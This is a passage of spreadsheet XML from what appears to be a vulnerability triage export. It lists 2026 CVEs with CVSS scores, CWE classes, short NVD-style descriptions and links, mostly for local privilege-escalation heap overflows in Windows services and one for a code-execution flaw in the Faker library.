        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H867" s="5" t="inlineStr"/>
      <c r="I867" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J867" s="5" t="inlineStr"/>
      <c r="K867" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L867" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72944</t>
        </is>
      </c>
    </row>
    <row r="868">
      <c r="A868" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72953</t>
        </is>
      </c>
      <c r="C868" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D868" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E868" s="5" t="inlineStr"/>
      <c r="F868" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G868" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H868" s="5" t="inlineStr"/>
      <c r="I868" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J868" s="5" t="inlineStr"/>
      <c r="K868" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L868" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72953</t>
        </is>
      </c>
    </row>
    <row r="869">
      <c r="A869" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72957</t>
        </is>
      </c>
      <c r="C869" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D869" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E869" s="5" t="inlineStr"/>
      <c r="F869" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G869" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H869" s="5" t="inlineStr"/>
      <c r="I869" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J869" s="5" t="inlineStr"/>
      <c r="K869" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L869" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Deployment Services allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72957</t>
        </is>
      </c>
    </row>
    <row r="870">
      <c r="A870" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72965</t>
        </is>
      </c>
      <c r="C870" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D870" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E870" s="5" t="inlineStr"/>
      <c r="F870" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G870" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H870" s="5" t="inlineStr"/>
      <c r="I870" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J870" s="5" t="inlineStr"/>
      <c r="K870" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L870" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows WebClient Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72965</t>
        </is>
      </c>
    </row>
    <row r="871">
      <c r="A871" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72967</t>
        </is>
      </c>
      <c r="C871" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D871" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E871" s="5" t="inlineStr"/>
      <c r="F871" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G871" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H871" s="5" t="inlineStr"/>
      <c r="I871" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J871" s="5" t="inlineStr"/>
      <c r="K871" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L871" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Network Connection Broker allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72967</t>
        </is>
      </c>
    </row>
    <row r="872">
      <c r="A872" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72988</t>
        </is>
      </c>
      <c r="C872" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D872" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E872" s="5" t="inlineStr"/>
      <c r="F872" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G872" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H872" s="5" t="inlineStr"/>
      <c r="I872" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J872" s="5" t="inlineStr"/>
      <c r="K872" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L872" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72988</t>
        </is>
      </c>
    </row>
    <row r="873">
      <c r="A873" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72990</t>
        </is>
      </c>
      <c r="C873" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D873" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E873" s="5" t="inlineStr"/>
      <c r="F873" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G873" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H87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873" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J873" s="5" t="inlineStr"/>
      <c r="K873" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L873" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72990</t>
        </is>
      </c>
    </row>
    <row r="874">
      <c r="A874" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72991</t>
        </is>
      </c>
      <c r="C874" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D874" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E874" s="5" t="inlineStr"/>
      <c r="F874" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G874" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H874" s="5" t="inlineStr"/>
      <c r="I874" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J874" s="5" t="inlineStr"/>
      <c r="K874" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L874" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72991</t>
        </is>
      </c>
    </row>
    <row r="875">
      <c r="A875" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72992</t>
        </is>
      </c>
      <c r="C875" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D875" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E875" s="5" t="inlineStr"/>
      <c r="F875" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G875" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H875" s="5" t="inlineStr"/>
      <c r="I875" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J875" s="5" t="inlineStr"/>
      <c r="K875" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L875" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72992</t>
        </is>
      </c>
    </row>
    <row r="876">
      <c r="A876" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72993</t>
        </is>
      </c>
      <c r="C876" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D876" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E876" s="5" t="inlineStr"/>
      <c r="F876" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G876" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H876" s="5" t="inlineStr"/>
      <c r="I876" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J876" s="5" t="inlineStr"/>
      <c r="K876" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L876" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72993</t>
        </is>
      </c>
    </row>
    <row r="877">
      <c r="A877" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72994</t>
        </is>
      </c>
      <c r="C877" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D877" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E877" s="5" t="inlineStr"/>
      <c r="F877" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G877" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H877" s="5" t="inlineStr"/>
      <c r="I877" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J877" s="5" t="inlineStr"/>
      <c r="K877" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L877" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72994</t>
        </is>
      </c>
    </row>
    <row r="878">
      <c r="A878" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B878" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72995</t>
        </is>
      </c>
      <c r="C878" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D878" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E878" s="5" t="inlineStr"/>
      <c r="F878" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G878" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H87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878" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J878" s="5" t="inlineStr"/>
      <c r="K878" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L878" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72995</t>
        </is>
      </c>
    </row>
    <row r="879">
      <c r="A879" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72996</t>
        </is>
      </c>
      <c r="C879" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D879" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E879" s="5" t="inlineStr"/>
      <c r="F879" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G879" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H879" s="5" t="inlineStr"/>
      <c r="I879" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J879" s="5" t="inlineStr"/>
      <c r="K879" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L879" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72996</t>
        </is>
      </c>
    </row>
    <row r="880">
      <c r="A880" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72997</t>
        </is>
      </c>
      <c r="C880" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D880" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E880" s="5" t="inlineStr"/>
      <c r="F880" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G880" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H880" s="5" t="inlineStr"/>
      <c r="I880" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J880" s="5" t="inlineStr"/>
      <c r="K880" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L880" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72997</t>
        </is>
      </c>
    </row>
    <row r="881">
      <c r="A881" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73000</t>
        </is>
      </c>
      <c r="C881" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D881" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E881" s="5" t="inlineStr"/>
      <c r="F881" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G881" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H881" s="5" t="inlineStr"/>
      <c r="I881" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J881" s="5" t="inlineStr"/>
      <c r="K881" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L881" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73000</t>
        </is>
      </c>
    </row>
    <row r="882">
      <c r="A882" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73001</t>
        </is>
      </c>
      <c r="C882" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D882" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E882" s="5" t="inlineStr"/>
      <c r="F882" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G882" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H88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882" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J882" s="5" t="inlineStr"/>
      <c r="K882" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L882" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73001</t>
        </is>
      </c>
    </row>
    <row r="883">
      <c r="A883" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73002</t>
        </is>
      </c>
      <c r="C883" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D883" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E883" s="5" t="inlineStr"/>
      <c r="F883" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G883" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H883" s="5" t="inlineStr"/>
      <c r="I883" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J883" s="5" t="inlineStr"/>
      <c r="K883" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L883" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73002</t>
        </is>
      </c>
    </row>
    <row r="884">
      <c r="A884" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73007</t>
        </is>
      </c>
      <c r="C884" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D884" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E884" s="5" t="inlineStr"/>
      <c r="F884" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G884" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H884" s="5" t="inlineStr"/>
      <c r="I884" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J884" s="5" t="inlineStr"/>
      <c r="K884" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L884" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73007</t>
        </is>
      </c>
    </row>
    <row r="885">
      <c r="A885" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73011</t>
        </is>
      </c>
      <c r="C885" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D885" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E885" s="5" t="inlineStr"/>
      <c r="F885" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G885" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H88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885" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J885" s="5" t="inlineStr"/>
      <c r="K885" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L885" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73011</t>
        </is>
      </c>
    </row>
    <row r="886">
      <c r="A886" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73015</t>
        </is>
      </c>
      <c r="C886" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D886" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E886" s="5" t="inlineStr"/>
      <c r="F886" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G886" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H886" s="5" t="inlineStr"/>
      <c r="I886" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J886" s="5" t="inlineStr"/>
      <c r="K886" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L886" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73015</t>
        </is>
      </c>
    </row>
    <row r="887">
      <c r="A887" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73020</t>
        </is>
      </c>
      <c r="C887" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D887" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E887" s="5" t="inlineStr"/>
      <c r="F887" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G887" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H887" s="5" t="inlineStr"/>
      <c r="I887" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J887" s="5" t="inlineStr"/>
      <c r="K887" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L887" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73020</t>
        </is>
      </c>
    </row>
    <row r="888">
      <c r="A888" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73021</t>
        </is>
      </c>
      <c r="C888" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D888" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E888" s="5" t="inlineStr"/>
      <c r="F888" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G888" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H88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888" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J888" s="5" t="inlineStr"/>
      <c r="K888" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L888" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73021</t>
        </is>
      </c>
    </row>
    <row r="889">
      <c r="A889" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73024</t>
        </is>
      </c>
      <c r="C889" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D889" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E889" s="5" t="inlineStr"/>
      <c r="F889" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G889" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H889" s="5" t="inlineStr"/>
      <c r="I889" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J889" s="5" t="inlineStr"/>
      <c r="K889" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L889" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73024</t>
        </is>
      </c>
    </row>
    <row r="890">
      <c r="A890" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73026</t>
        </is>
      </c>
      <c r="C890" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D890" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E890" s="5" t="inlineStr"/>
      <c r="F890" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G890" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H89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890" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J890" s="5" t="inlineStr"/>
      <c r="K890" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L890" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73026</t>
        </is>
      </c>
    </row>
    <row r="891">
      <c r="A891" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73231</t>
        </is>
      </c>
      <c r="C891" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D891" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E891" s="5" t="inlineStr"/>
      <c r="F891" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G891" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H891" s="5" t="inlineStr"/>
      <c r="I891" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J891" s="5" t="inlineStr"/>
      <c r="K891" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L891" s="5" t="inlineStr">
        <is>
          <t>Faker generates massive amounts of fake data in the browser and Node.js. Prior to 10.5.0, the faker.helpers.fake method in src/modules/helpers/eval.ts allows attacker-controlled fake templates to access the Function constructor through fakeEval.resolveProperty when a function returns another function, enabling arbitrary JavaScript code execution. This issue is fixed in version 10.5.0.</t>
        </is>
      </c>
      <c r="M891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73231</t>
        </is>
      </c>
    </row>
    <row r="892">
      <c r="A892" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76967</t>
        </is>
      </c>
      <c r="C892" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D892" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
